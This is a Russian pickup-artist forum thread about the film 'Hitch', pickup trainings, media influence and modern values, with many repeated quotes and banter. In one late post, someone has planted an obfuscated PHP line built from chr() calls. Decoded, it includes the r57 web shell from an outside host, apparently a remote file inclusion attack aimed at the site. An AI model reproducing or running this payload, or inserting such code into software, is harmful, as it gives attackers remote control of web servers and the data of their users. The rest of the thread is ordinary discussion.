Перейти к публикации
В связи с нашествием спам-ботов у новичков временно отключена личка ×
пикап.Форум

Правило сьёма

skyslimer

Рекомендованные сообщения

Вчера совпало - и время нашлось и диск в руки попался, наконец то сподобился посмотрел этот фильм. Прикольная комедия не больше. (Мне её больше девчонки почему то расхваливали).

Но вот ведь мысль. В загнивающей Америке видимо это трабл ещё тот. Да и в россии появляются один за другим тренинги по пикапу. Неужто все так плохо ? Неужели теперь требуется учить человека знакомится и общатся. Вот вам плоды прогресса и эмансипации. Общество набирает экономико-политичекие обороты, одновременно теряя душу.

Первой мыслью у меня было что пропаганда пикапа - один из методов его убийства. Однако позже понял что это всего лишь метод общества барахтася немного на плаву социального дерьма. Причем чем финансово общество более успешно - тем социального дерьма больше. (Хм - новый закон).

Правильно говорил Иисус - благосостояние это от лукавого. Приобретая материальные блага мы не становимся лучше. Мы становимся к сожалению хуже, хотя кажется наоборот.

Так что же дальше ? Мне кажется умрет пикап, отомрет в человеке все необходимое для общения. Да и человек будет уже не тот. А тренинг по пикапу - первая ласточка конца.

Вот такие мыли лезут в голову после комедий. (Я травкой кстати не увлекаюсь).

Не знаю чем ты увлекаешься, но бросай это гиблое дело :) Потому как эта шняга у тебя приступы банального депрессняка вызывает.

В нашем обществе усиливается конкуренция между людбми за место под солнцем. Правила социальных игр усложняются. Поэтому и появились тренингии т.д. - там ты не учишься, там ты совершенствуешь данные от природы навыки.И вообще - сходи на улицц,поснимай, развейся. И не смотри комедий- они на тебя плохо влияют :)

Вчера совпало - и время нашлось и диск в руки попался, наконец то сподобился посмотрел этот фильм.  Прикольная комедия не больше. (Мне её больше девчонки почему то расхваливали).

Но вот ведь мысль. В загнивающей Америке видимо это трабл ещё тот. Да и в россии появляются один за другим тренинги по пикапу. Неужто все так плохо ? Неужели теперь требуется учить человека знакомится и общатся. Вот вам плоды прогресса и эмансипации. Общество набирает экономико-политичекие обороты, одновременно теряя душу.

Первой мыслью у меня было что пропаганда пикапа - один из методов его убийства. Однако позже понял что это всего лишь метод общества барахтася немного на плаву социального дерьма.  Причем чем финансово общество более успешно - тем социального дерьма больше. (Хм - новый закон).

Правильно говорил Иисус - благосостояние это от лукавого. Приобретая материальные блага мы не становимся лучше. Мы становимся к сожалению хуже, хотя кажется наоборот.

Так что же дальше ?  Мне кажется умрет пикап, отомрет в человеке все необходимое для общения. Да и человек будет уже не тот. А тренинг по пикапу - первая ласточка конца.

Вот такие мыли лезут в голову после комедий. (Я травкой кстати не увлекаюсь).

<{POST_SNAPBACK}>

верно про общество и социум..

только вот все социальные условности и убивают ту натуральную часть, которая присуцтвует в нас для простого общения девочки с мальчиком ;)

вот на тренингах её любыми путями и возвращают, некоторым она достаёца в извращённом виде, у некоторых просто проявляеца..

Не знаю чем ты увлекаешься, но бросай это гиблое дело :) Потому как эта шняга у тебя приступы банального депрессняка вызывает.

В нашем обществе усиливается конкуренция  между людбми за место под солнцем. Правила социальных игр усложняются. Поэтому и появились тренингии т.д. - там ты не учишься, там ты совершенствуешь  данные от природы навыки.И вообще - сходи на  улицц,поснимай,  развейся. И не смотри комедий- они на тебя плохо влияют :)

<{POST_SNAPBACK}>

Да нет, наверно это не депресняки, это скорее кризис среднего возраста. Переоценка ценностей. Скоро начну смысл жизни искать, как 33 исполнится буду апостолов набирать, пойду в крестовый поход на иерусалим. Там глядишь талант к малеванию откроется, напишу какую нибудь джаконду. Неохота мне вылазить на улицу, снимать тем паче. Банальная лень...

Место под солнцем... я предпочел бы под пальмой. :) Уеду я в абхазию к симпатишным абхазкам. Заведу отару овец и буду их программированию учить.

В нашем обществе усиливается конкуренция  между людбми за место под солнцем. Правила социальных игр усложняются. Поэтому и появились тренингии т.д. - там ты не учишься, там ты совершенствуешь  данные от природы навыки.И вообще - сходи на  улицц,поснимай,  развейся. И не смотри комедий- они на тебя плохо влияют :)

<{POST_SNAPBACK}>

Да нет, наверно это не депресняки, это скорее кризис среднего возраста. Переоценка ценностей. Скоро начну смысл жизни искать, как 33 исполнится буду апостолов набирать, пойду в крестовый поход на иерусалим. Там глядишь талант к малеванию откроется, напишу какую нибудь джаконду. Неохота мне вылазить на улицу, снимать тем паче. Банальная лень...

Место под солнцем... я предпочел бы под пальмой. :) Уеду я в абхазию к симпатишным абхазкам. Заведу отару овец и буду их программированию учить.

<{POST_SNAPBACK}>

А ты говорил траву не куришь.. Колись лучше где брал :)

А ты говорил траву не куришь.. Колись лучше где брал :)

<{POST_SNAPBACK}>

Неа не курю... я и так дурак. А когда покурю так вообще блуждающий биоробот.

Анегдот в тему:

Несется лось по лесу, туда пронесется сучья летят, обратно шишки падают.

Бегал, бегал... прибегает в бар. Говорит 50 грамм водки. Ему бармен отвечает - да ты че вон какой здоровый лось, тебе 50 грамм как слону дробинка. Лось - Да мне только для запаха... а дури и своей хватает. :)

я не модератор, но свои 5 копеек вставлю

на мой взгляд название топика и содержания поста не совпадают (кроме упоминания имени Хитча)

на мой взгляд суть этого топика это "пикап, современное общество, духовные и материальные ценности"

А по-моему пикап открывает человеку глаза на свои возможности. И дает возможность совершенствоваться. И это позитив. А От настоящей любви пикап не спасет

на мой взгляд название топика и содержания поста не совпадают (кроме упоминания имени Хитча)

на мой взгляд суть этого топика это "пикап, современное общество, духовные и материальные ценности"

<{POST_SNAPBACK}>

Твоя правда... хотел обсудить одно.. получилось другое.

Модератор !!! снесите этот топик... я открою другой где буду призывать народные массы к революционно повстанческим действиям направленных против врагов... в процессе обсуждения хоть выяснить кто враг и как его бить. <_<

раз уж речь зашла о пикапе современном обществе и его (общества) ценностях

любое занятие (и пикап среди прочего) отражает ценности своего общества

в древности больше в цене было умение выжить

вот и ценились умение фехтовать, умение охотиться, умение создать жилище, умение земледельца и т д

в современном обществе более актуальны умение лидировать, умение управлять без применения грубой физической силы

вот и ценятся умение делать и сохранять деньги, умение понимать людей и себя, умение ставить цели, умение манипулировать, умение эффективно общаться и т д

успех у женщин ценился во все времена. но в древности это было менее актуально. часто женщину выдавали за муж без согласия родителей за того кто по понятию родителей больше подходил (за того кто по большому счёту лучше умел выживать). брак заключался раз и навсегда (до смерти одного из супругов). внебрачные связи категорически осуждались и порицались (хоть и существовали).

поэтому с изменением института брака, появлением контрацепции и т д появился пикап. как ответ на изменения. есть спрос - есть предложение.

скоро будет и не 5 копеек

а тему в Барную стойку!

вот и ценились умение фехтовать, умение охотиться, умение создать жилище, умение земледельца и т д

в современном обществе более актуальны умение лидировать, умение управлять без применения грубой физической силы

вот и ценятся умение делать и сохранять деньги, умение понимать людей и себя, умение ставить цели, умение манипулировать, умение эффективно общаться и т д

успех у женщин ценился во все времена. но в древности это было менее актуально. часто женщину выдавали за муж без согласия родителей за того кто по понятию родителей больше подходил (за того кто по большому счёту лучше умел выживать). брак заключался раз и навсегда (до смерти одного из супругов). внебрачные связи категорически осуждались и порицались (хоть и существовали).

поэтому с изменением института брака, появлением контрацепции и т д появился пикап. как ответ на изменения. есть спрос - есть предложение.

<{POST_SNAPBACK}>

Я не против пикапа... пикап - это всего лишь слово. Многие успешно занимаются им не подозревая что такое пикап. (Я и сам пару лет назад всего услышал, что нофелет переименовал в пикап).

Проблема в другом - что этому приходится учить, и будь человек хоть трижды нобелевским лауэрятом (блин, как это правильно пишется ?), будь лидером, или богатым... может быть с виду офигенный мачо - но факт в том что человека нужно учить общатся. Не девок снимать а именно общатся.

А во всем по моему мнению виновато СМИ, оно лепит общество основываясь на законах рыночной экономии и фактически работает против человека, затыкая ему рот и заставляя мозги превращатся в студень. Хоть и смешно, но люди прутся покупать дезодорант AXE подсознательно надеясь что станут неотразимыми. Постоянно навязываются ложные стереотипы, ложное понимание мира. Мозг перенасыщается информацией (в основном ненужной) и человеку трудно общатся, потому как оторвав задницу от дивана выясняется что он не в состоянии адекватно реагировать на мир, ведь мир не крутится вокруг него... Спасибо что появился такой фильм как Правило сьёма (Да и раньше подобные были), он хоть немного приоткрывает человекам другое измерение, настоящее, неисковерканное... Но большинство так и останутся в теплом диване... потому как ломать сознание страшно. А пикап тренинги именно ломают сознание, ломают барьеры, ломают это долбанное представление человека заключающееся в том, что если он купил эту вещь, то он просто офигительный мачо и все телки его. Сначала ломают... а потом учат как надо. Хвала тем кто выбрался, хвала тем кто не сдался, я воспеваю вас - кинувших вызов собственным заблуждениям. А я пошел прилягу на диванчик... телек посмотрю. :huh:

Блин... завязываю... а то действительно за торчка примете.. :blink:

<{POST_SNAPBACK}>

Я не против пикапа... пикап - это всего лишь слово. Многие успешно занимаются им не подозревая что такое пикап. (Я и сам пару лет назад всего услышал, что нофелет переименовал в пикап).

Проблема в другом - что этому приходится учить, и будь человек хоть трижды нобелевским лауэрятом (блин, как это правильно пишется ?), будь лидером, или богатым... может быть с виду офигенный мачо - но факт в том что человека нужно учить общатся. Не девок снимать а именно общатся.

А во всем по моему мнению виновато СМИ, оно лепит общество основываясь на законах рыночной экономии и фактически работает против человека, затыкая ему рот и заставляя мозги превращатся в студень. Хоть и смешно, но люди прутся покупать дезодорант AXE подсознательно надеясь что станут неотразимыми. Постоянно навязываются ложные стереотипы, ложное понимание мира. Мозг перенасыщается информацией (в основном ненужной) и человеку трудно общатся, потому как оторвав задницу от дивана выясняется что он не в состоянии адекватно реагировать на мир, ведь мир не крутится вокруг него... Спасибо что появился такой фильм как Правило сьёма (Да и раньше подобные были), он хоть немного приоткрывает человекам другое измерение, настоящее, неисковерканное... Но большинство так и останутся в теплом диване... потому как ломать сознание страшно. А пикап тренинги именно ломают сознание, ломают барьеры, ломают это долбанное представление человека заключающееся в том, что если он купил эту вещь, то он просто офигительный мачо и все телки его. Сначала ломают... а потом учат как надо. Хвала тем кто выбрался, хвала тем кто не сдался, я воспеваю вас - кинувших вызов собственным заблуждениям. А я пошел прилягу на диванчик... телек посмотрю. :huh:

Блин... завязываю... а то действительно за торчка примете.. :blink:

<{POST_SNAPBACK}>

Присоединяюсь

"во всем по моему мнению виновато СМИ"

- как говорил один мой приятель - "во всём виноваты мясистые женщины"

да не СМИ виноваты, а люди

не нравится смотреть телек - не смотри

стереотипы всегда будут навязываться - не одни, так другие

у каждого человека есть выбор - идти к своей цели или всю жизнь работать ради целей других людей (суровая но правда)

"он хоть немного приоткрывает человекам другое измерение, настоящее, неисковерканное"

- да нет настоящего измерения. есть реальность и её восприятие. и мерить нужно не меркой соответствия реальности, а меркой эффективности действия в реальности

"но большинство так и останутся в теплом диване"

- останутся. ибо каждый делает свой выбор в жизни. каждый день каждый час. каждую секунду. что делать и что неделать. наша жизнь это результат наших выборов (хотя многим это тяжело принять).

"во всем по моему мнению виновато СМИ"

- как говорил один мой приятель - "во всём виноваты мясистые женщины"

да не СМИ виноваты, а люди

не нравится смотреть телек - не смотри

стереотипы всегда будут навязываться - не одни, так другие

у каждого человека есть выбор - идти к своей цели или всю жизнь работать ради целей других людей (суровая но правда)

"он хоть немного приоткрывает человекам другое измерение, настоящее, неисковерканное"

- да нет настоящего измерения. есть реальность и её восприятие. и мерить нужно не меркой соответствия реальности, а меркой эффективности действия в реальности

"но большинство так и останутся в теплом диване"

- останутся. ибо каждый делает свой выбор в жизни. каждый день каждый час. каждую секунду. что делать и что неделать. наша жизнь это результат наших выборов (хотя многим это тяжело принять).

<{POST_SNAPBACK}>

Так ведь нравится им смотреть этот телек... Как паутина затягивает. И мне нравится. А боротся с ласковым врагом... почти бесполезно если не знаешь его сути. Согласен виноваты люди, люди всегда создают что либо и попадают в сети своего же прогресса.

"Настоящее измерение" - всего лишь метафора. Есть реальность, есть только кто её видел ? И что такое настоящее измерение для тебя и другое настоящее измерение для меня. Разные вещи наверное... никто ведь не знает.

Все !!!! Ни слова больше в этом топике.. а то смысл жизни найдем... айда на улицу девок трахать !!! :D

токо тоже посмотрел фильмец.......грусно и скучно.........явно потребительская картина.......у меня есть цель......я заплачу......я получу.....

и все мы боимся что если поломать в нас чтото что нам не мешает то вдруг поломается то что нам нравится......

поетому и сидим мы около "волшебного ящика", будь то телек, комп или чегото еще.......

но вобще мисль стрельнула.......

это есть лень, а она ето двигатель прогреса.......веть есть наверное способи познакомится с девушкой невыходя из квартиры.....но ми его не знаем......как говорят химики......любая реакцыя (химическая)возможна, просто надо найти правельный катализатор..........

• 10 месяцев спустя...

****( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

Забей и не парься. Это же фильм. Зато у американцев есть такая проблема, точнее они все жирные и я даже не представляю как они занимаются сексом...наверное как колобки. )))))

Архивировано

Эта тема находится в архиве и закрыта для публикации сообщений.

• Сейчас на странице   0 пользователей

Нет пользователей, просматривающих эту страницу.

• Новое

1. 150

Уходить, решать?

2. 150

Уходить, решать?

3. 150

Уходить, решать?

4. 43

Личный сценарий на 2025 год

5. 49

Западаю на СОшек

• Создать...